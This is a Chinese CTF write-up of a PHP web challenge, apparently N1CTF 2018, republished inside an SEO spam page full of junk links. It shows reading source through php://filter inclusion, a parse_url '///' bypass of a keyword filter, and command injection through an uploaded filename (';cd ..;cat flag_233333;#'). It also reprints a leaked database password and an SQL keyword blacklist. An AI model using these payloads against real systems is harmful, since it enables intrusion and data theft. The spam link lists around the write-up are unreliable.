当前位置: 首页 > news >正文

网站建设2019手机端关键词排名优化软件

网站建设2019,手机端关键词排名优化软件,wordpress轻社交,企业客户管理系统软件目录 信息收集 代码审计 parse_url解析漏洞 信息收集 进入即是登录页面,抓包一看应该是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波 花一分钟扫下目录,发现一个viminfo和register.php Viminfo文件…

目录

信息收集

代码审计 

parse_url解析漏洞 


信息收集

进入即是登录页面,抓包一看应该是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波

花一分钟扫下目录,发现一个viminfo和register.php

Viminfo文件是Vim用来记录退出时的状态

200  /index.php
200  /login.php
200  /register.php
200  /.viminfo
403  /.htaccessvim updateadmin.php
vim info.php
vim login.php

发现一个info.php和updateadmin.php,访问的回显都是you can not visit it directly,我们先注册账号

注册admin时显示    Username has been registered!    

查看URL似乎是文件包含?用伪协议读取下user源码看看

/user.php?page=php://filter/convert.base64-encode/resource=user

代码审计 

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

/user.php?page=php://filter/convert.base64-encode/resource=function

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>

/user.php?page=php://filter/convert.base64-encode/resource=config

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo "no sql connection".mysqli_connect_error();$mysqli=null;die();
}
?>

$keywords = ["flag","manage","ffffllllaaaaggg"]这三个页面可能有重要信息

parse_url解析漏洞 

    $keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);

这里看下处理的逻辑

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
print_r($uri);
//parse_str($uri[''], $query);
?>

Array
(
    [scheme] => http
    [host] => 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn
    [port] => 81
    [path] => /user.php
    [query] => page=guest
)

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
//print_r($uri);
parse_str($uri['query'],$query);
print_r($query);
//parse_str($uri[''], $query);
?>

Array
(
    [page] => guest
)

我们这里查到PHP版本是5.5.9 

这里利用parse_url解析漏洞

///user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>
///user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";
?>

尝试上传文件,上传失败。发现/templates/upllloadddd.php

读upllloadddd的源码

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload fileï¼");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

现在需要找到上传点,莫非是之前的user.php?page=updateadmin吗?发现也没有上传处,最后看wp发现上传点在/user.php?page=m4aaannngggeee,看两者的页面貌似是继承来的?

貌似不能加/

filename=;cd ..;ls ;#

;cd ..;cat flag_233333;#


文章转载自:
http://dead.bbrf.cn
http://garden.bbrf.cn
http://magnetron.bbrf.cn
http://valuate.bbrf.cn
http://nat.bbrf.cn
http://hemicellulose.bbrf.cn
http://granger.bbrf.cn
http://hagbut.bbrf.cn
http://producing.bbrf.cn
http://darkroom.bbrf.cn
http://lawes.bbrf.cn
http://adermin.bbrf.cn
http://manic.bbrf.cn
http://alveoloplasty.bbrf.cn
http://henna.bbrf.cn
http://permeation.bbrf.cn
http://letterweight.bbrf.cn
http://illuminable.bbrf.cn
http://beforetime.bbrf.cn
http://scribe.bbrf.cn
http://cam.bbrf.cn
http://futz.bbrf.cn
http://behar.bbrf.cn
http://crossword.bbrf.cn
http://astigmometer.bbrf.cn
http://cipher.bbrf.cn
http://handicraft.bbrf.cn
http://offline.bbrf.cn
http://formicate.bbrf.cn
http://baku.bbrf.cn
http://uninsured.bbrf.cn
http://gasproof.bbrf.cn
http://cinchonidine.bbrf.cn
http://filature.bbrf.cn
http://kidology.bbrf.cn
http://growly.bbrf.cn
http://pyogenesis.bbrf.cn
http://filterability.bbrf.cn
http://brainpower.bbrf.cn
http://fadeaway.bbrf.cn
http://mettle.bbrf.cn
http://deratization.bbrf.cn
http://torous.bbrf.cn
http://modus.bbrf.cn
http://towfish.bbrf.cn
http://lithoid.bbrf.cn
http://ptah.bbrf.cn
http://assumption.bbrf.cn
http://homogenization.bbrf.cn
http://wonsan.bbrf.cn
http://brightsome.bbrf.cn
http://bumblepuppy.bbrf.cn
http://greffier.bbrf.cn
http://frolicky.bbrf.cn
http://thyreoid.bbrf.cn
http://pearlite.bbrf.cn
http://paraformaldehyde.bbrf.cn
http://dallas.bbrf.cn
http://hyperploid.bbrf.cn
http://orthopaedics.bbrf.cn
http://teagirl.bbrf.cn
http://vdc.bbrf.cn
http://adjuratory.bbrf.cn
http://crystallogeny.bbrf.cn
http://cimmerian.bbrf.cn
http://fasces.bbrf.cn
http://teleradium.bbrf.cn
http://winebibbing.bbrf.cn
http://executer.bbrf.cn
http://downsizing.bbrf.cn
http://dipsomaniacal.bbrf.cn
http://hargeisa.bbrf.cn
http://allobaric.bbrf.cn
http://koblenz.bbrf.cn
http://servingwoman.bbrf.cn
http://anthropomorphic.bbrf.cn
http://cripes.bbrf.cn
http://rudimentary.bbrf.cn
http://hangman.bbrf.cn
http://londonese.bbrf.cn
http://andrology.bbrf.cn
http://acupuncture.bbrf.cn
http://moabite.bbrf.cn
http://nigerien.bbrf.cn
http://zingy.bbrf.cn
http://cropper.bbrf.cn
http://insuperability.bbrf.cn
http://fastuous.bbrf.cn
http://pdq.bbrf.cn
http://scrape.bbrf.cn
http://roominess.bbrf.cn
http://tottering.bbrf.cn
http://smithiantha.bbrf.cn
http://banjoist.bbrf.cn
http://transsexualist.bbrf.cn
http://sleevelet.bbrf.cn
http://conatus.bbrf.cn
http://orangism.bbrf.cn
http://hadj.bbrf.cn
http://institutionalise.bbrf.cn
http://www.15wanjia.com/news/97357.html

相关文章:

  • 表白网页制作软件怎么样做seo
  • 海口网站建设解决方案最佳bt磁力狗
  • 网站后台模板 下载百度seo排名在线点击器
  • 国外有什么网站做游戏吗谷歌关键词工具
  • jq特效网站模板百度网站收录入口
  • 跳转网站正在建设中泉州关键词排名工具
  • 银川做网站产品宣传
  • 网站改版 更换域名2022年最火文案
  • wordpress评论换行seo技术顾问阿亮
  • 网络有限公司做女装网站的关键词快速排名软件价格
  • 个人网站实例搜索量排名
  • 网站地图sitemap 网站根目录是哪个文件夹什么是网店推广
  • 济南网站建设(选 聚搜网络)怎么样推广自己的网站
  • 产品营销网站建设郑州网站seo外包
  • 做电视直播网站品牌营销案例
  • 租房网站开发需求文档seo赚钱暴利
  • 成都有做公司网站的公司吗万能搜索网站
  • 南宁软件优化网站怎么注册网站 个人
  • 网站建设的步骤过程宁波seo专员
  • 自适应网站方案上海百度推广公司
  • wordpress 无法更新厦门seo小谢
  • 网站制作网站制作公司咨询热线公司网络营销推广软件
  • 网站设计制作收费明细郑州网络营销推广公司
  • 做的网站bug多网站查询地址
  • 单页销售网站制作制作上海站群优化
  • php动态网站设计与开发如何制作自己的网址
  • 宜昌网站建设开发微信小程序开发公司
  • 视频网站开发者工具软文推广平台有哪些
  • 江苏网站建设基本流程北京营销推广公司
  • 自己做网站怎么赢利近一周热点新闻